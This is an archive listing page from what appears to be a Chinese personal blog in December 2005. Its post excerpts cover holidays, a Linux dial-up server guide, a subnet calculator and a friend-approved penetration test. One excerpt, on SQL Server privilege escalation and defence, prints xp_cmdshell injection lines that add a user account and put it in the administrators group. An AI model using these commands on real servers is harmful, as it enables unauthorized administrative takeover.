注册 | 登录 | 归档 | 搜索 | 标签 | 评论 | 链接 | 滚动板 | 在线工具
浏览模式: 标准 | 列表 2005年12月的文章

圣诞是什么颜色的?

Posted by amxku on 2005-12-26, 10:10 PM

这是迟来的一个调查 虽然平安夜已经过去两天了 但却是我一直想做的
最近受到垃圾spam的困扰 不得已加了验证码 给大家留言带来了不便深表遗憾...
下面调查开始

» 阅读全文

其它 | 评论: 3 | 阅读: 2240

L-Blog存在严重跨站漏洞

Posted by amxku on 2005-12-25, 1:19 AM

l-blog存在严重跨站漏洞

» 阅读全文

Tags: l-blog, 漏洞

共享 | 评论: 1 | 阅读: 2596

今天是平安夜

Posted by amxku on 2005-12-24, 10:11 PM

今天是平安夜..哈哈,幸好这几天坏坏过来了哦,不然的话,俺只有抱着我的电脑一个人孤独的度过....

» 阅读全文

其它 | 评论: 5 | 阅读: 2345

男人=天使

Posted by amxku on 2005-12-24, 9:21 AM

男人=天使

» 阅读全文

其它 | 评论: 3 | 阅读: 2601

实现Linux下的局域网远程接入

Posted by amxku on 2005-12-24, 9:03 AM

本文介绍一种利用linux服务器的两个串口构建拨号服务器的方法,远程用户可以通过拨号连接到局域网,方便地进行信息传递和资源共享。

  笔者的配置环境是Red Hat 8.0 linux操作系统,所需的硬件包括两个外置Modem(分别连接到COM1和COM2端口)和两条电话线。实现步骤如下:

» 阅读全文

Tags: linux

技术 | 评论: 0 | 阅读: 2038

发如雪MV

Posted by amxku on 2005-12-19, 9:29 AM

发如雪MV

» 阅读全文

其它 | 评论: 6 | 阅读: 2316

记一次渗透测试

Posted by amxku on 2005-12-18, 10:49 AM

一个教师朋友做了一个学习网站,让我帮忙检查安全性,只提供了网页地址。
首先使用superscan扫了一下常用端口,没有问题,只开了80,返回IIS5.0,win2K差不离;
扫描常见cgi/IIS漏洞,没有问题,打了sp4补丁,到目前为止还不错;
到网页上转了转,发现是用asp写的,自然要扫扫sql注入了,也许你以为这次成功了吧,很不幸,没有。
自己做的网页,自然没有asp源代码看,后台也扫不出来,这下没办法了吧?

听说他要做个bbs,但是网页上没有链接,于是根据他的习惯和网站名称猜bbs名字,
终于,哈哈,http://x.y.z.v/xxxbbs出来了,进去看了一看,晕倒,bbs也是自己搞的,很简陋
已经有几篇测试文章了。
不过,有个细节,每个发文人都有一副照片,而且不是QQ里面那种,同时看看了路径,/xxxbbs/myfaces
上传上去的?......
立马申请一个用户进去,果真可以换脸,哈哈哈
upfile.asp,打开居然看到了“文件名”、上传

» 阅读全文

技术 | 评论: 0 | 阅读: 2225

SQL Server提升权限相关命令及防范

Posted by amxku on 2005-12-18, 9:33 AM

exec master..xp_cmdshell "net user name password /add"--
;exec master..xp_cmdshell "net localgroup administrators name /add"--

程序代码开启cmdshell的SQL语句

» 阅读全文

共享 | 评论: 0 | 阅读: 2002

子网掩码计算器

Posted by amxku on 2005-12-17, 3:34 PM

一个方便快捷的计算 IP 子网的免费工具。可以随意调整掩码位,
因此可用来计算不标准的子网。
只要输入点分十进制的 IP 地

» 阅读全文

Tags: 子网掩码

共享 | 评论: 0 | 阅读: 2107

生成静态页大全[ASP/PHP/ASPX]

Posted by amxku on 2005-12-17, 3:19 PM

随着网站访问量的加大,每次从数据库读取都是以效率作为代价的,很多用ACCESS作数据库的更会深有体会,静态页加在搜索时,也会被优先考虑。互联网上流行的做法是将数据源代码写入数据库再从数据库读取生

» 阅读全文

技术 | 评论: 0 | 阅读: 2783

Records:321234